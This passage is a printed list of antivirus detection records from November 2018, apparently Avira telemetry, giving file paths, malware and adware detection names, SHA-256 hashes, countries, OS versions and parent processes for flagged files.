  Row(detection=Row(filename='avscan-20181102-082432-2cbeb87b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d48d98b8\\AVSCAN-20181102-082049-03B6DDCB\\AVSCAN-20181102-082432-2CBEB87B', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='9a433500a68682e31adc76345d0965a53ff6c930f059fe6a910a3bbbdf7242d9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tien.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Tien\\Tien.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='80b48bbb80ed2b360a73ec987b718c5da91efc9431fc6443c65a6742a95f88bb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\WinMiner\\Miners\\EWBF64_0.3.4\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/minimized', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Locktime Software\\NetLimiter 4\\NLClientApp.exe', parentsize=55632, timestamp='2018-11-02T19:06:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='daemon-tools-lite-1040-serial-key-only.exe', filepath='I:\\Downloads\\DAEMON-Tools-Lite-1040-Serial-Key-Only.exe', filesize=1024000, name='HEUR/AGEN.1011385.#M1.#R1'), hash='ae40fa4808ef667cfef3e30d183a01ac1babbf001e8ea76fb14ec098c7f613be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675384, timestamp='2018-11-02T04:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filepath='/home/sneubert/Downloads/ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', filesize=704000, name='TR/ATRAPS.Gen.#M2.#R699'), hash='ac9a9e65d85f6e46e657d5af7e87712fe6e0b35d6791f8c158e28b40b64104b9', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='Ubuntu 18', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-02T12:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~seefe8.tmp', filepath='\\\\?\\E:\\Users\\X\\AppData\\Local\\Temp\\~seEFE8.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='8b5b05bb198a1858dc3268339fd7bfa8e38ac7cfbcbd5cbb267d748dfc951f8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083303-c39a8e73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083303-C39A8E73', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110528-dfa99c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110528-DFA99C9F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113152-59a60933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a2ec167\\AVSCAN-20181102-113121-54683BD5\\AVSCAN-20181102-113152-59A60933', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:31:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kibitzing.dll', filepath='\\\\?\\C:\\Program Files (x86)\\kaelin\\kibitzing.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T11:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181030-140538-4585853c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47c9cc32\\AVSCAN-20181030-140455-3E0A10A1\\AVSCAN-20181030-140538-4585853C', filesize=896000, name='HEUR/AGEN.1011092.#M1.#R1'), hash='f5ad2f8f9231e34a64cdfb5dbb2a3b294e0d53857a5f0fa94c0cce2bfc15bbc7', metadata=Row(cmdline='-r', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Endpoint Security 10 for Windows SP1\\avp.exe', parentsize=1221400, timestamp='2018-11-02T03:41:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='G:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083322-c6072dd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083322-C6072DD4', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iim marmagya.exe', filepath='G:\\\xa0\\IIM Marmagya\\IIM Marmagya.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='D:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M2.#R5505'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:45:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b5f53f4a1ca251510350c0b86782540501c5ccbd37eab5ffe1bc13bb100fe51a.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B5F53F4A1CA251510350C0B86782540501C5CCBD37EAB5FFE1BC13BB100FE51A.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b5f53f4a1ca251510350c0b86782540501c5ccbd37eab5ffe1bc13bb100fe51a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-025943-a3266c81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-025943-A3266C81', filesize=372000, name='Worm/Agent.2170901.#M300.#R2295'), hash='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsi6B2F.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T08:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130022-e373fa68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-125704-CC8E852B\\AVSCAN-20181102-130022-E373FA68', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:57:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171043-048a3eee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_074e821e\\AVSCAN-20181102-163806-F3CB18C2\\AVSCAN-20181102-171043-048A3EEE', filesize=6656000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='dc4d7d62f0e2429c9ad8f0bc7a8dd6610f838f752f855ce430ba8299b0faa79c', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_2680449d.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_2680449d.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:01:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='E:\\farescd\\flashUpdate (1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T18:18:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0029234c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029234c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:07:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122040-5c85a67c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b23c743\\AVSCAN-20181104-121940-50D19844\\AVSCAN-20181104-122040-5C85A67C', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:20:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120653-14d38d8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28522a7f\\AVSCAN-20181104-120223-EF441C8A\\AVSCAN-20181104-120653-14D38D8A', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dc7d11602e891165cdb4366b046ef348becb7c82', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\dc7d11602e891165cdb4366b046ef348becb7c82', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-223323-90bb807c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5bb6a51\\AVSCAN-20181104-222729-4CD45D0B\\AVSCAN-20181104-223323-90BB807C', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='de097ac894119793c04d5623006b50724947491431a1f0234624afcce606d15f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:33:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296dfb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296dfb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:35:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023886e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023886e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cf8a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cf8a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:43:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133556-c0d67852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133556-C0D67852', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:35:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297a96', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297a96', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:54:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webdbg.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Tools\\WebDbg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f59808154fc19bdae8d213c379265e5c61c08e477f9fbaea9203eeeb522d70c9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:10:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsm9C27.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Downloads\\Fotor3_3.4.1_163.15_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T12:26:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='file.exe', filepath='C:\\Octave\\Octave-4.4.0\\bin\\file.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='dfed9382ae20690e605f349e8f19b45f10489bc9e14435762763648f8a7cfbba', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-04T18:01:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103058-0977709e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8c0249e0\\AVSCAN-20181104-102926-F6A44DE3\\AVSCAN-20181104-103058-0977709E', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:30:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skimmed.exe', filepath='C:\\Program Files (x86)\\Skimmed\\Skimmed.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:sFTRkviRGkWQmP0l.1', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:55:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f57fafd6c96258b7f001059c4a66d6dc8e880b87c961cfd263bae0628c7a41ba', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:47Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='561760fb4dd7d0fdc9a2debca7d117a9ccd7c7452103f6575682607b61e9c83c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='24b98a8d2032b474a2f994abbd2ef8a7acfdc243c58302e6ddc871a98deaa322', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154900-3f6833d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_729c5d97\\AVSCAN-20181102-154614-1EA9392C\\AVSCAN-20181102-154900-3F6833D6', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='52abdb1845fad81e4249dbd4626ae74d637c37d893578f7d9d53aae05d438f5f', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goku.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku\\Goku.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1adcd3c0c786fe2b4b7003ca5137bb46d6fe4391b9ad74a201985173a2517507', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a8eeffe5-f207-d9c7-be48-e0fa5384b6a5.exe', filepath='G:\\{33be04e9-9470-4c79-55bc-e4be7ce7a6c6}\\a8eeffe5-f207-d9c7-be48-e0fa5384b6a5.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='4bb35ea756d240fbf25310581d51df02fca4299705c9e4abd48f0d2b601df2df', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1879152, timestamp='2018-11-02T05:15:47Z'), dt=datetime.date(2018, 11, 2)),
